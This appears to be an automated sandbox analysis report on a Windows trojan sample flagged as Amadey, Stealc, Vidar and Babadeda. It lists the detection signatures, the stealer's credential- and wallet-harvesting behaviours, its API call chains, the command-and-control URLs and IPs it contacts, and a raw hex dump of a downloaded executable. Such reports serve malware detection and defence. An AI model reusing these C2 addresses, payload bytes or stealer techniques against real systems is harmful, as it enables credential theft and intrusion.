Windows Analysis Report
6SoKuOqyNh.exe

Overview

General Information

Sample name:	6SoKuOqyNh.exe renamed because original name is a hash value
Original sample name:	33a84ea233fe9fe1b4c85e533a228bbd.exe
Analysis ID:	1483008
MD5:	33a84ea233fe9fe1b4c85e533a228bbd
SHA1:	413d73dd32bcce870cf5edd4b777051762882034
SHA256:	a777bbce91625e3261edebb334be8610372daaf0790763fc2fd085db35b8463d
Tags:	32exetrojan
Infos:

Detection

Amadey, Babadeda, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Yara detected Amadeys stealer DLL

Yara detected Babadeda

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

PE file contains section with special chars

Searches for specific processes (likely to inject)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious File Creation In Uncommon AppData Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Babadeda	According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus users.	No Attribution	https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities	https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 6SoKuOqyNh.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://85.28.47.31/8405906461a5200c/mozglue.dll~	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll5	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/freebl3.dlll	Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/nss3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/5499d72b3a3e55be.php/B	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\1000003002\d27375200a.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 6SoKuOqyNh.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	11_2_00409BB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	11_2_00418940
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	11_2_0040C660
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	11_2_00407280
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	11_2_00409B10
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C656C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	11_2_6C656C80

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Unpacked PE file: 11.2.bfb8bb0dc7.exe.400000.0.unpack
Source: C:\Users\user\1000003002\d27375200a.exe	Unpacked PE file: 12.2.d27375200a.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Unpacked PE file: 36.2.bfb8bb0dc7.exe.400000.0.unpack
Source: C:\Users\user\1000003002\d27375200a.exe	Unpacked PE file: 37.2.d27375200a.exe.400000.0.unpack

Uses 32bit PE files

Source: 6SoKuOqyNh.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.95.31.18:443 -> 192.168.2.6:58976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.6:58977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:58978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.6:58979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.6:58980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:59007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:59023 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:59033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.76:443 -> 192.168.2.6:59081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.68:443 -> 192.168.2.6:59082 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.42.73.29:443 -> 192.168.2.6:59084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.42.73.29:443 -> 192.168.2.6:59086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:59087 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:59096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.42.73.29:443 -> 192.168.2.6:59102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:59101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.65.39.85:443 -> 192.168.2.6:59100 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59118 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:59123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59152 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:59155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59160 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59159 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59158 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:63406 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63456 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63455 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63454 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63457 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63458 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63453 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63460 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63459 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63461 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:63514 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.189.173.27:443 -> 192.168.2.6:63518 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:63649 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59315 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59314 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:59333 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: bfb8bb0dc7.exe, 0000000B.00000002.3127973139.000000006C6BD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: freebl3.pdb source: freebl3.dll.11.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.11.dr
Source:	Binary string: nss3.pdb@ source: bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr
Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdbV source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: softokn3.dll.11.dr
Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdb source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.11.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.11.dr, msvcp140.dll.11.dr
Source:	Binary string: nss3.pdb source: bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr
Source:	Binary string: mozglue.pdb source: bfb8bb0dc7.exe, 0000000B.00000002.3127973139.000000006C6BD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: softokn3.pdb source: softokn3.dll.11.dr

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	11_2_0040D8C0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_0040F4F0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	11_2_0040BCB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	11_2_004139B0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	11_2_0040E270
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_00401710
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_004143F0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_0040DC50
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	11_2_00414050
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	11_2_0040EB60
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	11_2_004133C0

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: firefox.exe

Memory has grown: Private usage: 1MB later: 98MB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://85.28.47.31/5499d72b3a3e55be.php

Connects to many different domains

Source: unknown

Network traffic detected: DNS query count 35

Detected non-DNS traffic on DNS port

Source: global traffic	TCP traffic: 192.168.2.6:59286 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:63315 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:63380 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:58975 -> 162.159.36.2:53

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 11:49:05 GMTContent-Type: application/octet-streamContent-Length: 265728Last-Modified: Fri, 26 Jul 2024 11:45:54 GMTConnection: keep-aliveETag: "66a38c72-40e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 45 b1 47 ff 01 d0 29 ac 01 d0 29 ac 01 d0 29 ac 6e a6 82 ac 1a d0 29 ac 6e a6 b7 ac 11 d0 29 ac 6e a6 83 ac 65 d0 29 ac 08 a8 ba ac 08 d0 29 ac 01 d0 28 ac 73 d0 29 ac 6e a6 86 ac 00 d0 29 ac 6e a6 b3 ac 00 d0 29 ac 6e a6 b4 ac 00 d0 29 ac 52 69 63 68 01 d0 29 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f5 24 f0 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1a 02 00 00 b4 03 02 00 00 00 00 3c 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 05 02 00 04 00 00 0a fe 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 58 02 00 64 00 00 00 00 c0 04 02 f0 d7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 59 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 53 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 19 02 00 00 10 00 00 00 1a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a0 32 00 00 00 30 02 00 00 34 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 2e 02 02 00 70 02 00 00 dc 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 69 74 69 00 00 00 d3 02 00 00 00 a0 04 02 00 04 00 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6a 6f 74 69 62 65 00 00 04 00 00 00 b0 04 02 00 04 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 d7 00 00 00 c0 04 02 00 d8 00 00 00 36 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
